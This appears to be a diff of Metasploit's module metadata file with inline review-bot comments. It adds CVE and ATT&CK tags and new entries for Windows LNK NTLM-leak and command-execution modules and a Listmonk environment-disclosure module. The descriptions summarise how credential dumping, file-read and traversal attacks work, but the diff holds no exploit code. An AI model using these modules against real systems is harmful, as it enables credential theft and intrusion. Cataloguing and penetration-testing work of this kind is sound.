"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_automatic_plugin_privesc",
@@ -6519,6 +6527,7 @@
],
"description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.",
"references": [
"CVE-2015-10139",
"WPVDB-7785"
],
"platform": "",
@@ -6540,7 +6549,7 @@
"https"
],
"targets": null,
"mod_time": "2025-05-16 01:16:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_wplms_privilege_escalation",
@@ -9795,6 +9804,7 @@
],
"description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.",
"references": [
"CVE-1999-0920",
"OSVDB-368",
"BID-1484"
],
@@ -9804,7 +9814,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-05-21 08:32:40 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb",
"is_install_path": true,
"ref_name": "admin/pop2/uw_fileretrieval",
@@ -11234,7 +11244,8 @@
"description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.",
"references": [
"URL-http://sourceforge.net/projects/smbexec",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access"
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"ATT&CK-T1003.003"
],
"platform": "",
"arch": "",
@@ -11248,7 +11259,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2025-05-21 08:32:40 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
"is_install_path": true,
"ref_name": "admin/smb/psexec_ntdsgrab",
@@ -15617,6 +15628,7 @@
],
"description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.",
"references": [
"CVE-2016-10542",
"URL-https://nodesecurity.io/advisories/550",
"CWE-400"
],
@@ -15626,7 +15638,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-05-09 00:08:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/dos/http/ws_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/ws_dos",
@@ -15830,6 +15842,7 @@
],
"description": "This module exploits a denial of service condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.",
"references": [
"CVE-2015-1930",
"EDB-38979",
"OSVDB-132307"
],
@@ -15839,7 +15852,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-05-15 08:43:24 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_tsm_dos",
@@ -17224,6 +17237,7 @@
],
"description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.",
"references": [
"CVE-2011-10029",
"EDB-16204"
],
"platform": "",
@@ -17232,7 +17246,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-05-13 23:28:13 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/solarftp_user",
@@ -17487,14 +17501,16 @@
"Sil3nt_Dre4m"
],
"description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.",
"references": [],
"references": [
"CVE-2011-10020"
],
"platform": "",
"arch": "",
"rport": 27888,
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-05-13 23:28:13 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/dos/windows/games/kaillera.rb",
"is_install_path": true,
"ref_name": "dos/windows/games/kaillera",
@@ -18363,6 +18379,7 @@
],
"description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.",
"references": [
"CVE-2013-10065",
"OSVDB-92081",
"URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html"
],
@@ -18372,7 +18389,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-05-13 23:28:13 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/ssh/sysax_sshd_kexchange",
@@ -18677,6 +18694,130 @@
"needs_cleanup": false,
"actions": []
},
"auxiliary_fileformat/datablock_padding_lnk": {
"name": "Windows Shortcut (LNK) Padding",
"fullname": "auxiliary/fileformat/datablock_padding_lnk",
"aliases": [],
"rank": 300,
"disclosure_date": "2025-07-19",
"type": "auxiliary",
"author": [
"Nafiez"
],
"description": "This module generates Windows LNK (shortcut) file that can execute\n arbitrary commands. The LNK file uses environment variables and execute\n its arguments from COMMAND_LINE_ARGUMENTS with extra juicy whitespace\n character padding bytes and concatenates the actual payload.",
"references": [
"ZDI-25-148",
"URL-https://zeifan.my/Windows-LNK/",
"URL-https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1",
"URL-https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-09-29 10:12:50 +0000",
"path": "/modules/auxiliary/fileformat/datablock_padding_lnk.rb",
"is_install_path": true,
"ref_name": "fileformat/datablock_padding_lnk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": false,
"actions": []
},
"auxiliary_fileformat/environment_variable_datablock_leak": {
"name": "Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak",
"fullname": "auxiliary/fileformat/environment_variable_datablock_leak",
"aliases": [],
"rank": 300,
"disclosure_date": "2025-05-06",
"type": "auxiliary",
"author": [
"Nafiez"
],
"description": "This module creates a malicious Windows shortcut (LNK) file that\n specifies a special UNC path in EnvironmentVariableDataBlock of Shell Link (.LNK)\n that can trigger an authentication attempt to a remote server. This can be used\n to harvest NTLM authentication credentials.\n\n When a victim right-click the generated LNK file, it will attempt to connect to the\n the specified UNC path, resulting in an SMB connection that can be captured\n to harvest credentials.",
"references": [
"URL-https://zeifan.my/Right-Click-LNK/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-09-29 11:37:42 +0000",
"path": "/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb",
"is_install_path": true,
"ref_name": "fileformat/environment_variable_datablock_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"screen-effects"
],
"Reliability": []
},
"session_types": false,
"needs_cleanup": false,
"actions": []
},
"auxiliary_fileformat/icon_environment_datablock_leak": {
"name": "IconEnvironmentDataBlock - Windows LNK File Special UNC Path NTLM Leak",
"fullname": "auxiliary/fileformat/icon_environment_datablock_leak",
"aliases": [],
"rank": 300,
"disclosure_date": "2025-05-16",
"type": "auxiliary",
"author": [
"Nafiez"
],
"description": "This module creates a malicious Windows shortcut (LNK) file that\n specifies a special UNC path in IconEnvironmentDataBlock of Shell Link (.LNK)\n that can trigger an authentication attempt to a remote server. This can be used\n to harvest NTLM authentication credentials.\n\n When a victim browse to the location of the LNK file, it will attempt to\n connect to the the specified UNC path, resulting in an SMB connection that\n can be captured to harvest credentials.",
"references": [
"URL-https://zeifan.my/Right-Click-LNK/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-09-29 11:37:42 +0000",
"path": "/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb",
"is_install_path": true,
"ref_name": "fileformat/icon_environment_datablock_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
],
"Reliability": []
},
"session_types": false,
"needs_cleanup": false,
"actions": []
},
"auxiliary_fileformat/maldoc_in_pdf_polyglot": {
"name": "Maldoc in PDF Polyglot converter",
"fullname": "auxiliary/fileformat/maldoc_in_pdf_polyglot",
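Review bot: the three new LNK module descriptions need a grammar pass in the module sources: "generates Windows LNK (shortcut) file" should be "generates a Windows LNK (shortcut) file", "uses environment variables and execute its arguments" should be "executes", "When a victim right-click the generated LNK file" should be "right-clicks", "When a victim browse to the location" should be "browses", and "connect to the the specified UNC path" has a duplicated "the" in both leak modules. Separately, icon_environment_datablock_leak cites only https://zeifan.my/Right-Click-LNK/, the same write-up as environment_variable_datablock_leak, although it is a different block (IconEnvironmentDataBlock), a different trigger (browsing to the folder rather than right-clicking) and a different disclosure date (2025-05-16 vs 2025-05-06); confirm that is the intended reference or add the one that covers this variant.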
@@ -18798,6 +18939,44 @@
"needs_cleanup": false,
"actions": []
},
"auxiliary_fileformat/specialfolder_leak": {
"name": "SpecialFolderDatablock - Windows LNK File Special UNC Path NTLM Leak",
"fullname": "auxiliary/fileformat/specialfolder_leak",
"aliases": [],
"rank": 300,
"disclosure_date": "2025-05-10",
"type": "auxiliary",
"author": [
"Nafiez"
],
"description": "This module creates a malicious Windows shortcut (LNK) file that\n specifies a special UNC path in SpecialFolderDatablock of Shell Link (.LNK)\n that can trigger an authentication attempt to a remote server. This can be used\n to harvest NTLM authentication credentials.\n\n When a victim browse to the location of the LNK file, it will attempt to\n connect to the the specified UNC path, resulting in an SMB connection that\n can be captured to harvest credentials.",
"references": [],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-09-29 11:33:33 +0000",
"path": "/modules/auxiliary/fileformat/specialfolder_leak.rb",
"is_install_path": true,
"ref_name": "fileformat/specialfolder_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": false,
"actions": []
},
"auxiliary_fileformat/word_unc_injector": {
"name": "Microsoft Word UNC Path Injector",
"fullname": "auxiliary/fileformat/word_unc_injector",
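Review bot: specialfolder_leak ships with `"references": []` despite a disclosure_date of 2025-05-10 and a description that mirrors the sibling LNK leak modules; a module that credits an author and a disclosure date should cite the advisory or write-up it was derived from, as the other Nafiez modules in this diff do. The description also carries the same "When a victim browse" and "the the specified UNC path" slips noted for the sibling entries.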
@@ -19863,6 +20042,7 @@
],
"description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.",
"references": [
"CVE-2013-5967",
"EDB-32644"
],
"platform": "Linux",
@@ -19884,7 +20064,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_iso27001_sqli",
@@ -20124,6 +20304,7 @@
],
"description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.",
"references": [
"CVE-2014-6041",
"URL-http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html",
"URL-https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef",
"URL-http://trac.webkit.org/changeset/96826/webkit"
@@ -20134,7 +20315,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/android_object_tag_webview_uxss.rb",
"is_install_path": true,
"ref_name": "gather/android_object_tag_webview_uxss",
@@ -20932,9 +21113,11 @@
],
"description": "This module leverages an unauthenticated arbitrary root file read vulnerability for\n Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades\n are enabled on affected devices, traversal payloads can be used to read any files on\n the local file system. Password hashes read from disk may be cracked, potentially\n resulting in administrator-level access to the target device. This vulnerability is\n tracked as CVE-2024-24919.",
"references": [
"CVE-2024-24919",
"URL-https://support.checkpoint.com/results/sk/sk182336",
"URL-https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/",
"URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/"
"URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/",
"ATT&CK-T1003.008"
],
"platform": "",
"arch": "",
@@ -20955,7 +21138,7 @@
"https"
],
"targets": null,
"mod_time": "2024-06-13 08:14:35 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb",
"is_install_path": true,
"ref_name": "gather/checkpoint_gateway_fileread_cve_2024_24919",
@@ -22605,7 +22788,8 @@
"EDB-47288",
"URL-https://www.fortiguard.com/psirt/FG-IR-18-384",
"URL-https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf",
"URL-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/"
"URL-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/",
"ATT&CK-T1003.008"
],
"platform": "",
"arch": "",
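Review bot: ATT&CK-T1003.008 is the "/etc/passwd and /etc/shadow" sub-technique, but the references kept here (FG-IR-18-384, the devco.re SSL VPN write-up, EDB-47288) and the module path shown in the next hunk (fortios_vpnssl_traversal_creds_leak.rb) describe a path-traversal read of SSL VPN credential data rather than a passwd/shadow dump. Confirm that T1003.008 is the intended mapping; elsewhere in this same diff comparable credential reads are tagged with the parent technique T1003 (ldap_passwords, qnap_backtrace_admin_hash, vmware_vcenter_vmdir_ldap), and consistency across the gather modules would help anyone filtering on these tags.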
@@ -22626,7 +22810,7 @@
"https"
],
"targets": null,
"mod_time": "2022-04-16 06:52:59 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/auxiliary/gather/fortios_vpnssl_traversal_creds_leak.rb",
"is_install_path": true,
"ref_name": "gather/fortios_vpnssl_traversal_creds_leak",
@@ -23618,6 +23802,7 @@
],
"description": "The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability\n within the login functionality. As of April 15, 2024 this was still unpatched, so all\n versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.\n\n Retrieving the victim's data may take a long amount of time. It is much quicker to\n get the logins, then just login to the site.",
"references": [
"CVE-2025-6095",
"URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
"URL-https://github.com/codesiddhant/Jasmin-Ransomware"
],
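Review bot: the new CVE-2025-6095 sits directly above a URL whose path names a different identifier, CVE-2024-30851, and a different bug class (a path traversal PoC), while the description dates the SQL injection to April 2024. Please confirm that CVE-2025-6095 is the ID assigned to this login SQL injection specifically, and consider stating in the description which CVE covers which issue so the two references are not read as describing the same flaw.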
@@ -23640,7 +23825,7 @@
"https"
],
"targets": null,
"mod_time": "2024-05-04 16:06:48 +0000",
"mod_time": "2025-10-07 14:03:32 +0000",
"path": "/modules/auxiliary/gather/jasmin_ransomware_sqli.rb",
"is_install_path": true,
"ref_name": "gather/jasmin_ransomware_sqli",
@@ -24001,6 +24186,7 @@
],
"description": "Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection\n which allows an attacker to access the database or read arbitrary files as the\n 'mysql' user. This module will only work if the mysql user Joomla is using\n to access the database has the LOAD_FILE permission.",
"references": [
"CVE-2014-7981",
"EDB-31459",
"URL-http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html"
],
@@ -24023,7 +24209,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_weblinks_sqli",
@@ -24275,7 +24461,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-08-15 15:34:13 +0000",
"mod_time": "2025-10-23 14:41:18 +0000",
"path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
"is_install_path": true,
"ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -24319,7 +24505,8 @@
"description": "This module will gather passwords and password hashes from a target LDAP server via multiple techniques\n including Windows LAPS. For best results, run with SSL because some attributes are only readable over\n encrypted connections.",
"references": [
"URL-https://blog.xpnsec.com/lapsv2-internals/",
"URL-https://github.com/fortra/impacket/blob/master/examples/GetLAPSPassword.py"
"URL-https://github.com/fortra/impacket/blob/master/examples/GetLAPSPassword.py",
"ATT&CK-T1003"
],
"platform": "",
"arch": "",
@@ -24327,7 +24514,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-07-18 17:10:35 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/auxiliary/gather/ldap_passwords.rb",
"is_install_path": true,
"ref_name": "gather/ldap_passwords",
@@ -24529,6 +24716,60 @@
}
]
},
"auxiliary_gather/listmonk_env_disclosure": {
"name": "Listmonk Insecure Sprig Template Functions Environment Disclosure",
"fullname": "auxiliary/gather/listmonk_env_disclosure",
"aliases": [],
"rank": 300,
"disclosure_date": "2025-06-08",
"type": "auxiliary",
"author": [
"Tarek Nakkouch"
],
"description": "This module exploits insecure Sprig template functions in Listmonk\n versions prior to v5.0.2. The env and expandenv functions are enabled\n by default, allowing authenticated users with campaign permissions to\n extract sensitive environment variables via campaign preview.",
"references": [
"CVE-2025-49136",
"URL-https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h"
],
"platform": "",
"arch": "",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2025-10-08 21:02:24 +0000",
"path": "/modules/auxiliary/gather/listmonk_env_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/listmonk_env_disclosure",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": []
},
"session_types": false,
"needs_cleanup": false,
"actions": []
},
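Review bot: the new listmonk_env_disclosure entry sets `"rport": 9000` but its autofilter_ports list is the generic HTTP set (80, 8080, 443, ...) and does not include 9000, so the module's own default port will not match the autofilter. If the default port is deliberately 9000, add it to the registered autofilter ports in the module; otherwise the entry is consistent with the description (authenticated, check implemented, post_auth true, ioc-in-logs side effect).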
"auxiliary_gather/magento_xxe_cve_2024_34102": {
"name": "Magento XXE Unserialize Arbitrary File Read",
"fullname": "auxiliary/gather/magento_xxe_cve_2024_34102",
@@ -24820,6 +25061,7 @@
],
"description": "Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.\n Upload function may delete the local file if the web service user has access.",
"references": [
"CVE-2025-34076",
"URL-https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/"
],
"platform": "",
@@ -24841,7 +25083,7 @@
"https"
],
"targets": null,
"mod_time": "2022-02-22 14:21:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/microweber_lfi.rb",
"is_install_path": true,
"ref_name": "gather/microweber_lfi",
@@ -26221,7 +26463,8 @@
"description": "This module exploits combined heap and stack buffer overflows for QNAP\n NAS and NVR devices to dump the admin (root) shadow hash from memory via\n an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.\n\n A binary search is performed to find the correct offset for the BOFs.\n Since the server forks, blind remote exploitation is possible, provided\n the heap does not have ASLR.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Feb/2",
"URL-https://en.wikipedia.org/wiki/Binary_search_algorithm"
"URL-https://en.wikipedia.org/wiki/Binary_search_algorithm",
"ATT&CK-T1003"
],
"platform": "",
"arch": "",
@@ -26242,7 +26485,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb",
"is_install_path": true,
"ref_name": "gather/qnap_backtrace_admin_hash",
@@ -26296,7 +26539,8 @@
"EDB-48531",
"URL-https://infosecwriteups.com/qnap-pre-auth-root-rce-affecting-450k-devices-on-the-internet-d55488d28a05",
"URL-https://www.qnap.com/en-us/security-advisory/nas-201911-25",
"URL-https://github.com/Imanfeng/QNAP-NAS-RCE"
"URL-https://github.com/Imanfeng/QNAP-NAS-RCE",
"ATT&CK-T1003.008"
],
"platform": "",
"arch": "",
@@ -26317,7 +26561,7 @@
"https"
],
"targets": null,
"mod_time": "2022-02-23 16:27:12 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/auxiliary/gather/qnap_lfi.rb",
"is_install_path": true,
"ref_name": "gather/qnap_lfi",
@@ -27383,6 +27627,7 @@
],
"description": "This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability\n allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order\n to retrieve all the usernames and their associated password from the database.",
"references": [
"CVE-2023-5350",
"URL-https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/",
"URL-https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6"
],
@@ -27405,7 +27650,7 @@
"https"
],
"targets": null,
"mod_time": "2024-01-07 15:02:53 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/suite_crm_export_sqli.rb",
"is_install_path": true,
"ref_name": "gather/suite_crm_export_sqli",
@@ -27814,7 +28059,8 @@
"description": "This module uses an anonymous-bind LDAP connection to dump data from\n the vmdir service in VMware vCenter Server version 6.7 prior to the\n 6.7U3f update, only if upgraded from a previous release line, such as\n 6.0 or 6.5.\n If the bind username and password are provided (BIND_DN and LDAPPassword\n options), these credentials will be used instead of attempting an\n anonymous bind.",
"references": [
"CVE-2020-3952",
"URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
"URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html",
"ATT&CK-T1003"
],
"platform": "",
"arch": "",
@@ -27822,7 +28068,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-06-05 16:33:42 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
"is_install_path": true,
"ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -27913,7 +28159,11 @@
],
"description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n remote Windows target without executing any agent locally. This is\n done by remotely updating the registry key security descriptor,\n taking advantage of the WriteDACL privileges held by local\n administrators to set temporary read permissions.\n\n This can be disabled by setting the `INLINE` option to false and the\n module will fallback to the original implementation, which consists\n in saving the registry hives locally on the target\n (%SYSTEMROOT%\\Temp\\<random>.tmp), downloading the temporary hive\n files and reading the data from it. This temporary files are removed\n when it's done.\n\n On domain controllers, secrets from Active Directory is extracted\n using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n other interesting data. Note that the actual `NTDS.dit` file is not\n downloaded. Instead, the Directory Replication Service directly asks\n Active Directory through RPC requests.\n\n This modules takes care of starting or enabling the Remote Registry\n service if needed. It will restore the service to its original state\n when it's done.\n\n This is a port of the great Impacket `secretsdump.py` code written by\n Alberto Solino.",
"references": [
"URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"
"URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
"ATT&CK-T1003.002",
"ATT&CK-T1003.004",
"ATT&CK-T1003.005",
"ATT&CK-T1003.006"
],
"platform": "",
"arch": "",
@@ -27927,7 +28177,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2025-05-21 11:40:06 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
"is_install_path": true,
"ref_name": "gather/windows_secrets_dump",
@@ -28362,6 +28612,7 @@
],
"description": "This module exploits a directory traversal bug in XBMC 11, up until the\n 2012-11-04 nightly build. The module can only be used to retrieve files.",
"references": [
"CVE-2012-10024",
"URL-https://forum.kodi.tv/showthread.php?tid=144110&pid=1227348",
"URL-https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335",
"URL-https://ioactive.com/pdfs/Security_Advisory_XBMC.pdf"
@@ -28385,7 +28636,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/gather/xbmc_traversal.rb",
"is_install_path": true,
"ref_name": "gather/xbmc_traversal",
@@ -30257,6 +30508,7 @@
],
"description": "This module exploits a directory traversal vulnerability found in ColoradoFTP server\n version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files\n from the server GET/PUT command including file system traversal strings starting with '\\'.\n The server is written in Java and therefore platform independent, however this vulnerability is only\n exploitable on the Windows version.",
"references": [
"CVE-2025-34110",
"EDB-40231",
"URL-https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86",
"URL-https://bugtraq.securityfocus.com/archive/1/539186"
@@ -30272,7 +30524,7 @@
"ftp"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/colorado_ftp_traversal",
@@ -30663,6 +30915,7 @@
],
"description": "This module exploits a directory traversal flaw found in A10 Networks\n (Soft) AX Loadbalancer version 2.6.1-GR1-P5/2.7.0 or less. When\n handling a file download request, the xml/downloads class fails to\n properly check the 'filename' parameter, which can be abused to read\n any file outside the virtual directory. Important files include SSL\n certificates. This module works on both the hardware devices and the\n Virtual Machine appliances. IMPORTANT NOTE: This module will also delete the\n file on the device after downloading it. Because of this, the CONFIRM_DELETE\n option must be set to 'true' either manually or by script.",
"references": [
"CVE-2014-125125",
"OSVDB-102657",
"BID-65206",
"EDB-31261"
@@ -30686,7 +30939,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/a10networks_ax_directory_traversal",
@@ -30997,6 +31250,7 @@
],
"description": "This module exploits a directory traversal vulnerability in Apache ActiveMQ\n 5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's\n ResourceHandler installed with the affected versions. This module has been tested\n successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.",
"references": [
"CVE-2010-1587",
"OSVDB-86401",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895",
"URL-https://issues.apache.org/jira/browse/amq-2788"
@@ -31020,7 +31274,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_activemq_traversal",
@@ -31756,6 +32010,7 @@
],
"description": "This module exploits a directory traversal vulnerability present in\n several Barracuda products, including the Barracuda Spam and Virus Firewall,\n Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,\n this module will attempt to download the Barracuda configuration file.",
"references": [
"CVE-2010-20109",
"OSVDB-68301",
"URL-https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/",
"EDB-15130"
